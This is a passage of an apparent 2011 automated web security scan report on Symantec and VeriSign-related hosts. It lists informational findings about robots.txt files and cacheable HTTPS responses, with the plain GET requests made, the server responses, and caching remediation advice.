HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:11 GMT Server: Omniture DC/2.0.0 Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT ETag: "1a8177-18-6e161ac0" Accept-Ranges: bytes Content-Length: 24 xserver: www606 Keep-Alive: timeout=15 Connection: close Content-Type: text/plain User-agent: * Disallow:
20.22. http://partnerlocator.symantec.com/public/search
Summary
Severity:
Information
Confidence:
Certain
Host:
http://partnerlocator.symantec.com
Path:
/public/search
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: partnerlocator.symantec.com
Response
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Fri, 09 Sep 2011 21:37:42 GMT Content-Type: text/plain Content-Length: 26 Last-Modified: Fri, 05 Feb 2010 14:46:53 GMT Connection: close Accept-Ranges: bytes User-agent: * Disallow: /
20.23. http://player.ooyala.com/player.js
Summary
Severity:
Information
Confidence:
Certain
Host:
http://player.ooyala.com
Path:
/player.js
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: player.ooyala.com
Response
HTTP/1.0 200 OK Server: Apache Last-Modified: Sun, 07 Aug 2011 04:04:05 GMT X-Ooyala-Server-Id: i-cfd6a4a3 Content-Type: text/plain Date: Fri, 09 Sep 2011 21:26:10 GMT Content-Length: 184 Connection: close # This robots.txt is only for api.ooyala.com and backlot.ooyala.com. It should not be used for www.ooyala.com. User-agent: * Disallow: / Allow: /backlot/web Allow: /syndication/google
20.24. http://productadvisor.symantec.com/app/en/US/adirect/symantec
Summary
Severity:
Information
Confidence:
Certain
Host:
http://productadvisor.symantec.com
Path:
/app/en/US/adirect/symantec
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: productadvisor.symantec.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:12 GMT Server: Apache/2.2.8 (Unix) Last-Modified: Thu, 19 Nov 2009 20:25:26 GMT ETag: "518003-273-478bf28d55980" Accept-Ranges: bytes Content-Length: 627 Connection: close Content-Type: text/plain User-agent: * Disallow: /*cmd=catCompare Disallow: /*cmd=symExtCatProductCompare Disallow: /*cmd=catProductDetail Disallow: /*cmd=symExtCatProductDetail Disallow: /*cmd=ProductPricer Disallow:...[SNIP]...
20.25. https://products.geotrust.com/signup/codesign.do
Summary
Severity:
Information
Confidence:
Certain
Host:
https://products.geotrust.com
Path:
/signup/codesign.do
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: products.geotrust.com
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 09 Sep 2011 21:46:16 GMT Content-Length: 26 Content-Type: text/plain User-agent: * Disallow: /
20.26. https://products.verisign.com/geocenter/reseller/logon.do
Summary
Severity:
Information
Confidence:
Certain
Host:
https://products.verisign.com
Path:
/geocenter/reseller/logon.do
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: products.verisign.com
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 09 Sep 2011 21:28:04 GMT Content-Length: 26 Content-Type: text/plain X-Powered-By: Servlet/2.5 JSP/2.1 User-agent: * Disallow: /
20.27. http://query.verisign.ch/search
Summary
Severity:
Information
Confidence:
Certain
Host:
http://query.verisign.ch
Path:
/search
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: query.verisign.ch
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:20 GMT Content-Type: text/plain Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT Content-Length: 26 Cache-Control: public, max-age=2592000 Expires: Sun, 09 Oct 2011 21:46:20 GMT Connection: close User-agent: * Disallow: /
20.28. http://query.verisign.com/search
Summary
Severity:
Information
Confidence:
Certain
Host:
http://query.verisign.com
Path:
/search
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: query.verisign.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:09 GMT Content-Type: text/plain Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT Content-Length: 26 Cache-Control: public, max-age=2592000 Expires: Sun, 09 Oct 2011 21:26:09 GMT Connection: close User-agent: * Disallow: /
20.29. https://query.verisign.com/search
Summary
Severity:
Information
Confidence:
Certain
Host:
https://query.verisign.com
Path:
/search
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: query.verisign.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:22 GMT Content-Type: text/plain Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT Content-Length: 26 Cache-Control: public, max-age=2592000 Expires: Sun, 09 Oct 2011 21:46:22 GMT Connection: close User-agent: * Disallow: /
20.30. http://rs.instantservice.com/resources/smartbutton/5851/II3_Servers.js
Summary
Severity:
Information
Confidence:
Certain
Host:
http://rs.instantservice.com
Path:
/resources/smartbutton/5851/II3_Servers.js
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: rs.instantservice.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:14 GMT Server: Apache Last-Modified: Thu, 14 Jul 2011 18:16:35 GMT ETag: "1a-887f66c0" Accept-Ranges: bytes Content-Length: 26 Vary: Accept-Encoding,User-Agent P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/plain; charset=iso-8859-1 User-agent: * Disallow: /
20.31. http://searchg.symantec.com/search
Summary
Severity:
Information
Confidence:
Certain
Host:
http://searchg.symantec.com
Path:
/search
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: searchg.symantec.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:33:30 GMT Content-Type: text/plain Last-Modified: Mon, 25 Apr 2011 16:15:31 GMT Content-Length: 26 Cache-Control: public, max-age=2592000 Expires: Sun, 09 Oct 2011 21:33:30 GMT Connection: close User-agent: * Disallow: /
20.32. https://ssl-certificate-center.verisign.ch/process/retail/console_login
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.ch
Path:
/process/retail/console_login
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: ssl-certificate-center.verisign.ch
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:44 GMT Server: Apache Set-Cookie: TLTHID=35E8520EDB2D10DB64618BD14E31479C; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Content-Length: 26 Vary: Accept-Encoding Connection: close Content-Type: text/plain User-agent: * Disallow: /
20.33. https://ssl-certificate-center.verisign.com/process/retail/console_login
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.com
Path:
/process/retail/console_login
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: ssl-certificate-center.verisign.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:45 GMT Server: Apache Set-Cookie: TLTHID=36B3AC56DB2D10DB49F6B1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Content-Length: 26 Vary: Accept-Encoding Connection: close Content-Type: text/plain User-agent: * Disallow: /
20.34. https://symantec-corporation.com/servlet/campaignrespondent
Summary
Severity:
Information
Confidence:
Certain
Host:
https://symantec-corporation.com
Path:
/servlet/campaignrespondent
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: symantec-corporation.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:34:30 GMT Server: Apache Last-Modified: Wed, 25 Aug 2010 22:10:50 GMT ETag: "4500a0-1a-48ead277f8e80" Accept-Ranges: bytes Content-Length: 26 Connection: close Content-Type: text/plain; charset=UTF-8 User-agent: * Disallow: /
20.35. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard
Summary
Severity:
Information
Confidence:
Certain
Host:
http://symantec.tt.omtrdc.net
Path:
/m2/symantec/mbox/standard
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: symantec.tt.omtrdc.net
Response
HTTP/1.1 200 OK Server: Test & Target Content-Type: text/plain Date: Fri, 09 Sep 2011 21:31:00 GMT Accept-Ranges: bytes ETag: W/"25-1309299047000" Connection: close Last-Modified: Tue, 28 Jun 2011 22:10:47 GMT Content-Length: 25 User-agent: * Disallow: /
20.36. https://test-products.verisign.com/geocenter/reseller/logon.do
Summary
Severity:
Information
Confidence:
Certain
Host:
https://test-products.verisign.com
Path:
/geocenter/reseller/logon.do
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: test-products.verisign.com
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 09 Sep 2011 21:46:49 GMT Content-Length: 26 Content-Type: text/plain User-agent: * Disallow: /
20.37. https://trust-center.verisign.ch/process/retail/trust_initial
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.ch
Path:
/process/retail/trust_initial
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: trust-center.verisign.ch
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:48 GMT Server: Apache Set-Cookie: TLTHID=3836F65ADB2D10DB68D2A5440567C536; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Content-Length: 26 Vary: Accept-Encoding Connection: close Content-Type: text/plain User-agent: * Disallow: /
20.38. https://trust-center.verisign.com/process/retail/trust_initial
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/trust_initial
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: trust-center.verisign.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: Apache Set-Cookie: TLTHID=6477053CDB2A10DB6A74CEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Content-Length: 26 Vary: Accept-Encoding Connection: close Content-Type: text/plain User-agent: * Disallow: /
20.39. http://twitter.com/statuses/user_timeline/pctools.json
Summary
Severity:
Information
Confidence:
Certain
Host:
http://twitter.com
Path:
/statuses/user_timeline/pctools.json
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: twitter.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:05:29 GMT Server: Apache Last-Modified: Tue, 06 Sep 2011 18:09:12 GMT Accept-Ranges: bytes Content-Length: 519 Cache-Control: max-age=86400 Expires: Sat, 10 Sep 2011 22:05:29 GMT Vary: Accept-Encoding X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/plain; charset=UTF-8 #Google Search Engine Robot User-agent: Googlebot # Crawl-delay: 10 -- Googlebot ignores crawl-delay ftl Allow: /*?*_escaped_fragment_ Disallow: /*? Disallow: /*/with_friends #Yahoo! Search Engine Ro...[SNIP]...
20.40. http://us.norton.com/index.jsp
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/index.jsp
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: us.norton.com
Response
HTTP/1.0 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Length: 534 Last-Modified: Thu, 29 Jul 2010 20:29:17 GMT ETag: "216-4c51e49d" Accept-Ranges: bytes Content-Type: text/plain Cache-Control: public, max-age=14760 Date: Fri, 09 Sep 2011 21:30:57 GMT Connection: close User-agent:* Disallow:/common/ Disallow:/content/ Disallow:/corp/ Disallow:/css/ Disallow:/ssi/ Disallow:/lib/ Disallow:/errors/ Disallow:/feedback/ Disallow:/media/ Disallow:/script/ Disal...[SNIP]...
20.41. https://us.norton.com/index.jsp
Summary
Severity:
Information
Confidence:
Certain
Host:
https://us.norton.com
Path:
/index.jsp
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: us.norton.com
Response
HTTP/1.0 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Length: 534 Last-Modified: Thu, 29 Jul 2010 20:29:17 GMT ETag: "216-4c51e49d" Accept-Ranges: bytes Content-Type: text/plain Cache-Control: public, max-age=21595 Date: Fri, 09 Sep 2011 21:47:34 GMT Connection: close User-agent:* Disallow:/common/ Disallow:/content/ Disallow:/corp/ Disallow:/css/ Disallow:/ssi/ Disallow:/lib/ Disallow:/errors/ Disallow:/feedback/ Disallow:/media/ Disallow:/script/ Disal...[SNIP]...
20.42. https://www-secure.symantec.com/feedback/webmaster.jsp
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www-secure.symantec.com
Path:
/feedback/webmaster.jsp
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: www-secure.symantec.com
Response
HTTP/1.0 200 OK Server: Sun-Java-System-Web-Server/7.0 Last-Modified: Fri, 09 Sep 2011 17:26:24 GMT ETag: "33-4e6a4c40" Content-Type: text/plain Cache-Control: public, max-age=8132 Date: Fri, 09 Sep 2011 21:47:33 GMT Content-Length: 51 Connection: close User-agent:* Disallow:/* Allow:/norton-support/
20.43. http://www.google-analytics.com/__utm.gif
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.google-analytics.com
Path:
/__utm.gif
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: www.google-analytics.com
Response
HTTP/1.0 200 OK Vary: Accept-Encoding Content-Type: text/plain Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT Date: Fri, 09 Sep 2011 21:25:58 GMT Expires: Fri, 09 Sep 2011 21:25:58 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block User-agent: * Disallow: /siteopt.js Disallow: /config.js
20.44. http://www.symantec.com/scripts/swfobject.js
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/scripts/swfobject.js
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: www.symantec.com
Response
HTTP/1.0 200 OK Server: Sun-Java-System-Web-Server/7.0 Last-Modified: Wed, 18 May 2011 10:02:58 GMT ETag: "1147-4dd39952" Content-Type: text/plain Cache-Control: public, max-age=1476 Date: Fri, 09 Sep 2011 21:26:10 GMT Content-Length: 4423 Connection: close # Standard List User-agent: * Disallow: /common/ Disallow: /content/ Disallow: /corp/ Disallow: /css/ Disallow: /ssi/ Disallow: /lib/ Disallow: /errors/ Disallow: /feedback/ Disallow: /media...[SNIP]...
20.45. http://www.verisign.ch/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: www.verisign.ch
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:12 GMT Server: Apache Last-Modified: Wed, 19 Jan 2011 20:21:58 GMT ETag: "2e58be0-5a-49a38c4d54580" Accept-Ranges: bytes Content-Length: 90 X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/plain User-Agent: * Disallow: /dm/ Disallow: /images/ Disallow: /Unlinked_Pages/ Disallow: /dev/
20.46. http://www.verisign.com/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: www.verisign.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:38 GMT Server: Apache Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT Accept-Ranges: bytes Content-Length: 2539 Expires: Sun, 09 Oct 2011 21:24:38 GMT Connection: close Content-Type: text/plain User-Agent: * Disallow: /aol/ Disallow: /att/ Disallow: /authentic/ Disallow: /aventail/ Disallow: /b2b/ Disallow: /cd/ Disallow: /cdrom/ Disallow: /cgi-bin/ Disallow: /checkpoint/ Disallow: /client/...[SNIP]...
20.47. https://www.verisign.com/products/site/
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.verisign.com
Path:
/products/site/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: www.verisign.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:47 GMT Server: Apache Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT Accept-Ranges: bytes Content-Length: 2539 Expires: Sun, 09 Oct 2011 21:27:47 GMT Connection: close Content-Type: text/plain User-Agent: * Disallow: /aol/ Disallow: /att/ Disallow: /authentic/ Disallow: /aventail/ Disallow: /b2b/ Disallow: /cd/ Disallow: /cdrom/ Disallow: /cgi-bin/ Disallow: /checkpoint/ Disallow: /client/...[SNIP]...
21. Cacheable HTTPS response
There are 73 instances of this issue:
Issue description
Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.
Issue remediation
The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:
Cache-control: no-store
Pragma: no-cache
21.1. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/en_us/assets/shared/js/google-analytics.js
Request
GET /authweb/en_us/assets/shared/js/google-analytics.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Age: 69191 Expires: Sun, 09 Oct 2011 02:25:41 GMT Content-Length: 461 var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-295855-1']); _gaq.push(['_setDomainName', '.verisign.com']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('scr...[SNIP]...
21.2. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/header/js/flyouts.js
Request
GET /authweb/global/assets/header/js/flyouts.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Age: 13 Expires: Sun, 09 Oct 2011 21:38:30 GMT Content-Length: 8048 //----------------------------------------// // My Account M-flyout form functionality //----------------------------------------// $("#myacc_search_btn").click(function(){ //document.get...[SNIP]...
21.3. https://cdn.verisign.com/authweb/global/assets/header/js/header.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/header/js/header.js
Request
GET /authweb/global/assets/header/js/header.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Age: 13 Expires: Sun, 09 Oct 2011 21:38:30 GMT Content-Length: 1558 /******************************************* ** Header functions ** *******************************************/ //----------------------------------------// //Load Defaults when DOM i...[SNIP]...
21.4. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/header/js/jquery.autocomplete.js
Request
GET /authweb/global/assets/header/js/jquery.autocomplete.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Age: 14 Expires: Sun, 09 Oct 2011 21:38:30 GMT Content-Length: 22148 /* * jQuery Autocomplete plugin 1.1 * * Copyright (c) 2009 J..rn Zaefferer * * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * ht...[SNIP]...
21.5. https://cdn.verisign.com/authweb/global/assets/home/js/home.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/home/js/home.js
Request
GET /authweb/global/assets/home/js/home.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Age: 16 Expires: Sun, 09 Oct 2011 21:38:32 GMT Content-Length: 2725 /******************************************* ** HP specific functions ** *******************************************/ //External link functionality $('a[rel="external"]').click(funct...[SNIP]...
21.6. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
Summary
Severity: Information
Confidence: Certain
Host: https://cdn.verisign.com
Path: /authweb/global/assets/shared/js/global-preload.js
Request
GET /authweb/global/assets/shared/js/global-preload.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Age: 69230 Expires: Sun, 09 Oct 2011 02:24:38 GMT Content-Length: 135518 // FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.js /*! * jQuery JavaScript Library v1.4.4 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the M...[SNIP]...
21.7. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js
Summary
Severity: Information
Confidence: Certain
Host: https://cdn.verisign.com
Path: /authweb/global/assets/shared/js/google-analytics.js
Request
GET /authweb/global/assets/shared/js/google-analytics.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:28 GMT Content-Length: 471 var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-295855-1']); _gaq.push(['_setDomainName', '.verisign.com']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElemen...[SNIP]...
21.8. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
Summary
Severity: Information
Confidence: Certain
Host: https://cdn.verisign.com
Path: /authweb/global/assets/shared/js/jquery.boxshadow.js
Request
GET /authweb/global/assets/shared/js/jquery.boxshadow.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:27 GMT Content-Length: 1538 /* ** * jquery-boxshadow.js * * $(object).boxshadow({ * hOffset : 3, * vOffset : 3, * shadowblur : 3, * color : '#808080' * }) * * If you are using this with IE, you should s...[SNIP]...
21.9. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
Summary
Severity: Information
Confidence: Certain
Host: https://cdn.verisign.com
Path: /authweb/global/assets/shared/js/jquery.cacheimage.js
Request
GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Age: 1 Expires: Sun, 09 Oct 2011 21:38:26 GMT Content-Length: 1356 /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plugin can be used to eliminate flashes of unstyled content (FOUC) and * improve perceived...[SNIP]...
21.10. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
Summary
Severity: Information
Confidence: Certain
Host: https://cdn.verisign.com
Path: /authweb/global/assets/shared/js/jquery.hover_intent.js
Request
GET /authweb/global/assets/shared/js/jquery.hover_intent.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Age: 39037 Expires: Sun, 09 Oct 2011 10:47:51 GMT Content-Length: 1614 /** * hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+ * <http://cherne.net/brian/resources/jquery.hoverIntent.html> * * @param f onMouseOver function || An object with configuration options * @p...[SNIP]...
21.11. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js
Summary
Severity: Information
Confidence: Certain
Host: https://cdn.verisign.com
Path: /authweb/global/assets/shared/js/oo-engine.js
Request
GET /authweb/global/assets/shared/js/oo-engine.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:28 GMT Content-Length: 1154 /* OnlineOpinion (S3tS v3.1) */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ var custom_var,...[SNIP]...
21.12. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js
Summary
Severity: Information
Confidence: Certain
Host: https://cdn.verisign.com
Path: /authweb/global/assets/shared/js/rotator.js
Request
GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Age: 77341 Expires: Sun, 09 Oct 2011 00:09:34 GMT Content-Length: 4102 var activeBannerId = ""; var activeBannerControllerId = ""; var activeTipId = ""; var rotate = true; var myBannerNumber = 1; var activeBannerNumber = myBannerNumber; var bannerItemsLength = $(...[SNIP]...
21.13. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
Summary
Severity: Information
Confidence: Certain
Host: https://cdn.verisign.com
Path: /authweb/global/assets/shared/js/shared.js
Request
GET /authweb/global/assets/shared/js/shared.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:29 GMT Content-Length: 37327 // FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plug...[SNIP]...
21.14. https://cert.webtrust.org/ViewSeal
Summary
Severity: Information
Confidence: Certain
Host: https://cert.webtrust.org
Path: /ViewSeal
Request
GET /ViewSeal HTTP/1.1 Host: cert.webtrust.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 20:14:30 GMT Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector) X-Cache: MISS from cert.webtrust.org Connection: close Content-Type: text/html Content-Length: 2834 java.lang.NumberFormatException: null at java.lang.Integer.parseInt(Integer.java:394) at java.lang.Integer.parseInt(Integer.java:476) at ca.cica.servlets.WebContext.getFormInt(WebContext.java:29) ...[SNIP]...
